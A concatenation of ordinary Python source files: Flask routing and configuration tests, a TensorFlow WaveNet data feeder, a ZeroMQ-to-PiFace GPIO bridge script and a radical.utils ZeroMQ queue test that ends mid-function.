# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host='example.com')
# Providing host_matching=True with static_folder but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == '<LocalProxy unbound>'
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route('/')
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get('/')
else:
assert client.get('/').status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize('debug', [True, False])
@pytest.mark.parametrize('use_debugger', [True, False])
@pytest.mark.parametrize('use_reloader', [True, False])
@pytest.mark.parametrize('propagate_exceptions', [None, True, False])
def test_werkzeug_passthrough_errors(monkeypatch, debug, use_debugger,
use_reloader, propagate_exceptions, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv['passthrough_errors'] = kwargs.get('passthrough_errors')
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.config['PROPAGATE_EXCEPTIONS'] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
assert False
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
assert False
@app.errorhandler(413)
def catcher(error):
return '42'
rv = client.post('/accept', data={'myfile': 'foo' * 100})
assert rv.data == b'42'
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
assert client.get('/de/').data == b'/de/about'
assert client.get('/de/about').data == b'/foo'
assert client.get('/foo').data == b'/en/about'
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
assert values == expected
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u'/киртест')
def index():
return 'Hello World!'
rv = client.get(u'/киртест')
assert rv.data == b'Hello World!'
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route('/')
def index():
return 'Awesome'
assert not app.got_first_request
assert client.get('/').data == b'Awesome'
with pytest.raises(AssertionError) as e:
@app.route('/foo')
def broken():
return 'Meh'
assert 'A setup function was called' in str(e.value)
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
assert client.get('/foo').data == b'Meh'
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get('/')
assert got == [42]
client.get('/')
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with client:
with pytest.raises(AssertionError) as e:
client.post('/foo', data={})
assert 'http://localhost/foo/' in str(e.value)
assert ('Make sure to directly send '
'your POST-request to this URL') in str(e.value)
rv = client.get('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
app.debug = False
with client:
rv = client.post('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
assert client.get('/foo/').data == b'foo'
assert client.get('/bar/').data == b'bar'
assert client.get('/bar/123').data == b'123'
def test_preserve_only_once(app, client):
app.debug = True
@app.route('/fail')
def fail_func():
1 // 0
for x in range(3):
with pytest.raises(ZeroDivisionError):
client.get('/fail')
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route('/fail')
def fail_func():
1 // 0
@app.route('/success')
def success_func():
return 'Okay'
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get('/fail')
assert errors == []
# But this request triggers it, and it's an error
client.get('/success')
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get('/success')
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get('x') is None
assert flask.g.get('x', 11) == 11
flask.g.x = 42
assert flask.g.get('x') == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert 'foo' in flask.g
assert 'foos' not in flask.g
assert sorted(flask.g) == ['bar', 'foo']
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config['SERVER_NAME'] = 'localhost.localdomain'
client = app.test_client()
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
rv = client.get('/', 'http://localhost.localdomain/')
assert rv.data == b'normal index'
rv = client.get('/', 'http://test.localhost.localdomain/')
assert rv.data == b'test index'
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config['SERVER_NAME'] = 'localhost.localdomain'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
rv = client.get('/', 'http://mitsuhiko.localhost.localdomain/')
assert rv.data == b'index for mitsuhiko'
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config['SERVER_NAME'] = 'localhost.localdomain:3000'
client = app.test_client()
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
rv = client.get('/', 'http://mitsuhiko.localhost.localdomain:3000/')
assert rv.data == b'index for mitsuhiko'
@pytest.mark.parametrize('matching', (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config['SERVER_NAME'] = 'localhost.localdomain:3000'
client = app.test_client()
@app.route('/')
def index():
return '', 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get('/', 'http://127.0.0.1:3000/')
assert rv.status_code == (404 if matching else 204)
# allow all subdomains if matching is disabled
rv = client.get('/', 'http://www.localhost.localdomain:3000/')
assert rv.status_code == (404 if matching else 204)
def test_multi_route_rules(app, client):
@app.route('/')
@app.route('/<test>/')
def index(test='a'):
return test
rv = client.open('/')
assert rv.data == b'a'
rv = client.open('/b/')
assert rv.data == b'b'
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule('/', 'index', self.index)
app.add_url_rule('/<test>/', 'index', self.index)
def index(self, test='a'):
return test
_ = View(app)
rv = client.open('/')
assert rv.data == b'a'
rv = client.open('/b/')
assert rv.data == b'b'
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv['result'] = 'running...'
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.run()
assert rv['result'] == 'running...'
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv['result'] = 'running on %s:%s ...' % (hostname, port)
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
hostname, port = 'localhost', 8000
app.run(hostname, port, debug=True)
assert rv['result'] == 'running on %s:%s ...' % (hostname, port)
@pytest.mark.parametrize('host,port,expect_host,expect_port', (
(None, None, 'pocoo.org', 8080),
('localhost', None, 'localhost', 8080),
(None, 80, 'pocoo.org', 80),
('localhost', 80, 'localhost', 80),
))
def test_run_from_config(monkeypatch, host, port, expect_host, expect_port, app):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.config['SERVER_NAME'] = 'pocoo.org:8080'
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config['MAX_COOKIE_SIZE'] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config['MAX_COOKIE_SIZE']
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route('/')
def index():
r = flask.Response('', status=204)
r.set_cookie('foo', 'bar' * 100)
return r
client.get('/')
assert len(recwarn) == 1
w = recwarn.pop()
assert 'cookie is too large' in str(w.message)
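# Setting MAX_COOKIE_SIZE to 0 disables the size check, so no new warning is expected below.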
app.config['MAX_COOKIE_SIZE'] = 0
client.get('/')
assert len(recwarn) == 0
|
feeder.py
|
import os
import threading
import time
import numpy as np
import tensorflow as tf
from datasets import audio
from infolog import log
from keras.utils import np_utils
from sklearn.model_selection import train_test_split
from .util import is_mulaw_quantize, is_scalar_input
_batches_per_group = 32
_pad = 0
class Feeder:
"""
Feeds batches of data into a queue in a background thread.
"""
def __init__(self, coordinator, metadata_filename, base_dir, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._train_offset = 0
self._test_offset = 0
if hparams.symmetric_mels:
self._spec_pad = -(hparams.max_abs_value + .1)
else:
self._spec_pad = -0.1
#Base directory of the project (to map files from different locations)
self._base_dir = base_dir
#Load metadata
self._data_dir = os.path.dirname(metadata_filename)
with open(metadata_filename, 'r') as f:
self._metadata = [line.strip().split('|') for line in f]
#Train test split
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches is not None
test_size = (hparams.wavenet_test_size if hparams.wavenet_test_size is not None
else hparams.wavenet_test_batches * hparams.wavenet_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.wavenet_data_random_state)
#Make sure test size is a multiple of batch size else round up
len_test_indices = _round_up(len(test_indices), hparams.wavenet_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.wavenet_batch_size
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches == self.test_steps
#Get conditioning status
self.local_condition, self.global_condition = self._check_conditions()
with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
if is_scalar_input(hparams.input_type):
input_placeholder = tf.placeholder(tf.float32, shape=(None, 1, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.float32, shape=(None, None, 1), name='audio_targets')
target_type = tf.float32
else:
input_placeholder = tf.placeholder(tf.float32, shape=(None, hparams.quantize_channels, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.int32, shape=(None, None, 1), name='audio_targets')
target_type = tf.int32
self._placeholders = [
input_placeholder,
target_placeholder,
tf.placeholder(tf.int32, shape=(None, ), name='input_lengths'),
]
queue_types = [tf.float32, target_type, tf.int32]
if self.local_condition:
self._placeholders.append(tf.placeholder(tf.float32, shape=(None, hparams.num_mels, None), name='local_condition_features'))
queue_types.append(tf.float32)
if self.global_condition:
self._placeholders.append(tf.placeholder(tf.int32, shape=(None, 1), name='global_condition_features'))
queue_types.append(tf.int32)
# Create queue for buffering data
queue = tf.FIFOQueue(8, queue_types, name='input_queue')
self._enqueue_op = queue.enqueue(self._placeholders)
variables = queue.dequeue()
self.inputs = variables[0]
self.inputs.set_shape(self._placeholders[0].shape)
self.targets = variables[1]
self.targets.set_shape(self._placeholders[1].shape)
self.input_lengths = variables[2]
self.input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning is disabled, override c inputs with None
if hparams.cin_channels < 0:
self.local_condition_features = None
else:
self.local_condition_features = variables[3]
self.local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning is disabled, override g inputs with None
if hparams.gin_channels < 0:
self.global_condition_features = None
else:
self.global_condition_features = variables[4]
self.global_condition_features.set_shape(self._placeholders[4].shape)
# Create queue for buffering eval data
eval_queue = tf.FIFOQueue(1, queue_types, name='eval_queue')
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
eval_variables = eval_queue.dequeue()
self.eval_inputs = eval_variables[0]
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_targets = eval_variables[1]
self.eval_targets.set_shape(self._placeholders[1].shape)
self.eval_input_lengths = eval_variables[2]
self.eval_input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning is disabled, override c inputs with None
if hparams.cin_channels < 0:
self.eval_local_condition_features = None
else:
self.eval_local_condition_features = eval_variables[3]
self.eval_local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning is disabled, override g inputs with None
if hparams.gin_channels < 0:
self.eval_global_condition_features = None
else:
self.eval_global_condition_features = eval_variables[4]
self.eval_global_condition_features.set_shape(self._placeholders[4].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
if self.global_condition:
global_condition_features = meta[3]
if global_condition_features == '<no_g>':
raise RuntimeError('Please redo the wavenet preprocessing (or GTA synthesis) to assign global condition features!')
else:
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def make_test_batches(self):
start = time.time()
#Read one example for evaluation
n = 1
#Test on entire test set (one sample at an evaluation step)
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
return batches
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.wavenet_batch_size
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
test_batches = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
'''Get a single example (input, output, len_output) from disk
'''
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
if 'linear' in mel_file:
raise RuntimeError('Linear spectrogram files selected instead of GTA mels, did you specify the wrong metadata?')
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
if self.global_condition:
global_condition_features = meta[3]
if global_condition_features == '<no_g>':
raise RuntimeError('Please redo the wavenet preprocessing (or GTA synthesis) to assign global condition features!')
else:
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def _prepare_batch(self, batch):
np.random.shuffle(batch)
#Limit time steps to save GPU Memory usage
max_time_steps = self._limit_time()
#Adjust time resolution for upsampling
batch = self._adjust_time_resolution(batch, self.local_condition, max_time_steps)
#time lengths
input_lengths = [len(x[0]) for x in batch]
max_input_length = max(input_lengths)
inputs = self._prepare_inputs([x[0] for x in batch], max_input_length)
targets = self._prepare_targets([x[0] for x in batch], max_input_length)
local_condition_features = self._prepare_local_conditions(self.local_condition, [x[1] for x in batch])
global_condition_features = self._prepare_global_conditions(self.global_condition, [x[2] for x in batch])
new_batch = (inputs, targets, input_lengths)
if local_condition_features is not None:
new_batch += (local_condition_features, )
if global_condition_features is not None:
new_batch += (global_condition_features, )
return new_batch
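# Note: the tuple returned above must stay in the same order as self._placeholders
# defined in __init__: (inputs, targets, input_lengths[, local_condition_features]
# [, global_condition_features]), since _enqueue_next_*_group zips them together.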
def _prepare_inputs(self, inputs, maxlen):
if is_mulaw_quantize(self._hparams.input_type):
#[batch_size, time_steps, quantize_channels]
x_batch = np.stack([_pad_inputs(np_utils.to_categorical(
x, num_classes=self._hparams.quantize_channels), maxlen) for x in inputs]).astype(np.float32)
else:
#[batch_size, time_steps, 1]
x_batch = np.stack([_pad_inputs(x.reshape(-1, 1), maxlen) for x in inputs]).astype(np.float32)
assert len(x_batch.shape) == 3
#Convert to channels first [batch_size, quantize_channels (or 1), time_steps]
x_batch = np.transpose(x_batch, (0, 2, 1))
return x_batch
def _prepare_targets(self, targets, maxlen):
#[batch_size, time_steps]
if is_mulaw_quantize(self._hparams.input_type):
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.int32)
else:
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.float32)
assert len(y_batch.shape) == 2
#Add extra axis (make it 3-dimensional)
y_batch = np.expand_dims(y_batch, axis=-1)
return y_batch
def _prepare_local_conditions(self, local_condition, c_features):
if local_condition:
maxlen = max([len(x) for x in c_features])
c_batch = np.stack([_pad_inputs(x, maxlen) for x in c_features]).astype(np.float32)
assert len(c_batch.shape) == 3
#[batch_size, c_channels, time_steps]
c_batch = np.transpose(c_batch, (0, 2, 1))
if self._hparams.normalize_for_wavenet:
#[-max, max] or [0,max]
T2_output_range = (-self._hparams.max_abs_value, self._hparams.max_abs_value) if self._hparams.symmetric_mels else (0, self._hparams.max_abs_value)
#rescale to [0, 1]
c_batch = np.interp(c_batch, T2_output_range, (0, 1))
else:
c_batch = None
return c_batch
def _prepare_global_conditions(self, global_condition, g_features):
if global_condition:
g_batch = np.array(g_features).astype(np.int32).reshape(-1, 1)
else:
g_batch = None
return g_batch
def _check_conditions(self):
local_condition = self._hparams.cin_channels > 0
global_condition = self._hparams.gin_channels > 0
return local_condition, global_condition
def _limit_time(self):
'''Limit time resolution to save GPU memory.
'''
if self._hparams.max_time_sec is not None:
return int(self._hparams.max_time_sec * self._hparams.sample_rate)
elif self._hparams.max_time_steps is not None:
return self._hparams.max_time_steps
else:
return None
def _adjust_time_resolution(self, batch, local_condition, max_time_steps):
'''Adjust time resolution between audio and local condition
'''
if local_condition:
new_batch = []
for b in batch:
x, c, g, l = b
if len(x) < len(c) * audio.get_hop_size(self._hparams):
pad_length = audio.get_hop_size(self._hparams) * len(c) - len(x)
if pad_length % 2 == 0:
x = np.pad(x, (pad_length//2, pad_length//2), mode='constant', constant_values=_pad)
else:
x = np.pad(x, (pad_length//2, (pad_length+1)//2), mode='constant', constant_values=_pad)
else:
c = self._pad_specs(c, len(x) // audio.get_hop_size(self._hparams))
self._assert_ready_for_upsample(x, c)
if max_time_steps is not None:
max_steps = _ensure_divisible(max_time_steps, audio.get_hop_size(self._hparams), True)
if len(x) > max_time_steps:
max_time_frames = max_steps // audio.get_hop_size(self._hparams)
start = np.random.randint(0, len(c) - max_time_frames)
time_start = start * audio.get_hop_size(self._hparams)
x = x[time_start: time_start + max_time_frames * audio.get_hop_size(self._hparams)]
c = c[start: start + max_time_frames, :]
self._assert_ready_for_upsample(x, c)
new_batch.append((x, c, g, l))
return new_batch
else:
new_batch = []
for b in batch:
x, c, g, l = b
x = audio.trim(x)
if max_time_steps is not None and len(x) > max_time_steps:
start = np.random.randint(0, len(c) - max_time_steps)
x = x[start: start + max_time_steps]
new_batch.append((x, c, g, l))
return new_batch
def _assert_ready_for_upsample(self, x, c):
assert len(x) % len(c) == 0 and len(x) // len(c) == audio.get_hop_size(self._hparams)
def _pad_specs(self, x, maxlen):
return np.pad(x, [(0, maxlen - x.shape[0]), (0, 0)], mode='constant', constant_values=self._spec_pad)
def _pad_inputs(x, maxlen):
return np.pad(x, [(0, maxlen - len(x)), (0, 0)], mode='constant', constant_values=_pad)
def _pad_targets(x, maxlen):
return np.pad(x, (0, maxlen - len(x)), mode='constant', constant_values=_pad)
def _round_up(x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _ensure_divisible(length, divisible_by=256, lower=True):
if length % divisible_by == 0:
return length
if lower:
return length - length % divisible_by
else:
return length + (divisible_by - length % divisible_by)
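# Worked example (illustrative values only): with a hop size of 256,
# _ensure_divisible(1000, 256, lower=True) returns 768 (the largest multiple of 256
# not exceeding 1000), and _round_up(10, 4) returns 12. These helpers keep audio
# sample counts aligned with the local-condition frame grid and the batch size.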
|
io_pifacedigitalio.py
|
import zmq
import argparse
import threading
import json
import pifacedigitalio as pfdio
from time import sleep
IN_PORTS = (
0b00000001,
0b00000010,
0b00000100,
0b00001000,
0b00010000,
0b00100000,
0b01000000,
0b10000000
)
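# Each entry is a one-bit mask for one of the eight PiFace inputs, so
# `port & IN_PORTS[i]` (used in the main loop below) tests whether input pin i is
# high, e.g. IN_PORTS[3] == 0b00001000.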
def parse_args():
"""
Specify and parse command line arguments.
"""
p = argparse.ArgumentParser()
p.add_argument("pub_uri")
p.add_argument("pull_uri")
p.add_argument("--pub_prefix", default="GPIO")
return p.parse_args()
def set_up_pub_socket(uri):
"""
Create ZeroMQ PUB socket and bind it to the specified uri.
"""
context = zmq.Context()
socket = context.socket(zmq.PUB)
socket.bind(uri)
return socket
def zmq_to_gpio_out(uri, gpio, stop_event):
"""
Create a ZeroMQ PULL socket, bind it to the specified uri, then change any
specified GPIO outputs according to messages received. Close the port and
return when stop_event is set.
"""
context = zmq.Context()
pull = context.socket(zmq.PULL)
pull.bind(uri)
while not stop_event.is_set():
try:
msg = pull.recv(zmq.NOBLOCK)
except zmq.error.Again:
stop_event.wait(0.01)
continue
print "Received message: %s" % msg
_handle_rx_msg(msg, gpio)
pull.close()
def _handle_rx_msg(msg, gpio):
"""
Decipher the received message and perform the desired functions on GPIO.
"""
try:
msg = json.loads(msg)
except ValueError as e:
print "Message was not JSON formatted, discarding: %s" % e
return
for pin, value in msg.items():
try:
gpio.output_pins[int(pin)].value = 1 if value else 0
except KeyError:
print "No output pin with index of %s" % pin
except ValueError:
print "Output pins must be numbers, not %s" % pin
if __name__ == "__main__":
args = parse_args()
gpio = pfdio.PiFaceDigital()
pub = set_up_pub_socket(args.pub_uri)
stop_event = threading.Event()
z2gpio = threading.Thread(
target=zmq_to_gpio_out, args=(args.pull_uri, gpio, stop_event))
z2gpio.start()
current_values = {}
try:
while True:
port = gpio.input_port.value
values = {i: bool(port & IN_PORTS[i]) for i in range(0,8)}
if values != current_values:
pub.send_unicode(
u"%s%s" % (args.pub_prefix, json.dumps(values)))
current_values = values
sleep(0.01)
except KeyboardInterrupt:
pass
finally:
stop_event.set()
print "Waiting for threads to finish ..."
z2gpio.join()
print "Closing ZMQ socket ..."
pub.close()
print "Bye!"
|
test_zmq_queue.py
|
#!/usr/bin/env python
__author__ = 'Radical.Utils Development Team'
__copyright__ = 'Copyright 2019, RADICAL@Rutgers'
__license__ = 'MIT'
import time
import pytest
import threading as mt
import radical.utils as ru
# ------------------------------------------------------------------------------
#
@pytest.mark.skip(reason="test has a timing problem and frequently fails")
def test_zmq_queue():
'''
create a bridge, 2 producers (A, B) and 2 consumers (C, D). Send with the
following message counts and approximate rates (see c_a, c_b and the put
delays below):
A: 100 messages at ~50/s
B: 200 messages at ~100/s
Ensure that
- the ratios of sent / received messages reflect the rates
- the local order of messages is preserved
- messages are received exactly once (no messages get lost / duplicated)
'''
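# EOF protocol used below: each producer finishes by putting a message with
# 'idx': None, and each consumer stops after receiving one such sentinel.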
c_a = 100
c_b = 200
cfg = ru.Config(cfg={'uid' : 'test_queue',
'channel' : 'test',
'kind' : 'queue',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 50,
'stall_hwm': 1,
})
b = ru.zmq.Queue(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_put)
assert(b.addr_out == b.addr_get)
C = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get))
D = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get))
A = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
B = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
data = dict()
def work_put(putter, uid, n, delay):
data[uid] = list()
idx = 0
while idx < n:
time.sleep(delay)
putter.put({'src' : uid,
'idx' : idx})
idx += 1
data[uid].append(uid)
# send EOF
putter.put({'src' : uid,
'idx' : None})
def work_get(getter, uid):
data[uid] = list()
done = False
n = 0
while not done:
msgs = getter.get()
for msg in msgs:
msg = ru.as_string(msg)
if msg['idx'] is None:
done = True
else:
data[uid].append(msg['src'])
n += 1
getter.stop()
t_a = mt.Thread(target=work_put, args=[A, 'A', c_a, 0.02])
t_b = mt.Thread(target=work_put, args=[B, 'B', c_b, 0.01])
t_c = mt.Thread(target=work_get, args=[C, 'C'])
t_d = mt.Thread(target=work_get, args=[D, 'D'])
t_a.daemon = True
t_b.daemon = True
t_c.daemon = True
t_d.daemon = True
t_a.start()
t_b.start()
t_c.start()
t_d.start()
time.sleep(3)
b.stop()
# uids = list(data.keys())
# for x in uids:
# for y in uids:
# print('%s: %s: %d' % (x, y, data[x].count(y)))
#
# print(len(data['A']))
# print(len(data['B']))
# print(len(data['C']))
# print(len(data['D']))
assert(data['A'].count('A') == c_a)
assert(data['B'].count('B') == c_b)
assert(len(data['A']) == c_a)
assert(len(data['B']) == c_b)
assert(data['C'].count('A') + data['C'].count('B') +
data['D'].count('A') + data['D'].count('B') == c_a + c_b)
avg = (c_a + c_b) / 2
assert(avg - 30 < data['C'].count('A') + data['C'].count('B') < avg + 30)
assert(avg - 30 < data['D'].count('A') + data['D'].count('B') < avg + 30)
# ------------------------------------------------------------------------------
#
def disabled_test_zmq_queue_cb():
'''
same test, but use subscriber callbacks for message delivery
'''
data = {'put': dict(),
'get': dict()}
c_a = 2
c_b = 4
cfg = ru.Config(cfg={'uid' : 'test_queue',
'channel' : 'test',
'kind' : 'queue',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 0,
'stall_hwm': 1,
})
def get_msg_a(msg):
uid, _ = msg.split('.')
if uid not in data['get']:
data['get'][uid] = list()
data['get'][uid].append(uid)
def get_msg_b(msg):
uid, _ = msg.split('.')
if uid not in data['get']:
data['get'][uid] = list()
data['get'][uid].append(uid)
b = ru.zmq.Queue(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_put)
assert(b.addr_out == b.addr_get)
time.sleep(2.0)
g_1 = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get), cb=get_msg_a)
g_2 = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get), cb=get_msg_b)
time.sleep(2.0)
A = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
B = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
def work_put(putter, uid, n, delay):
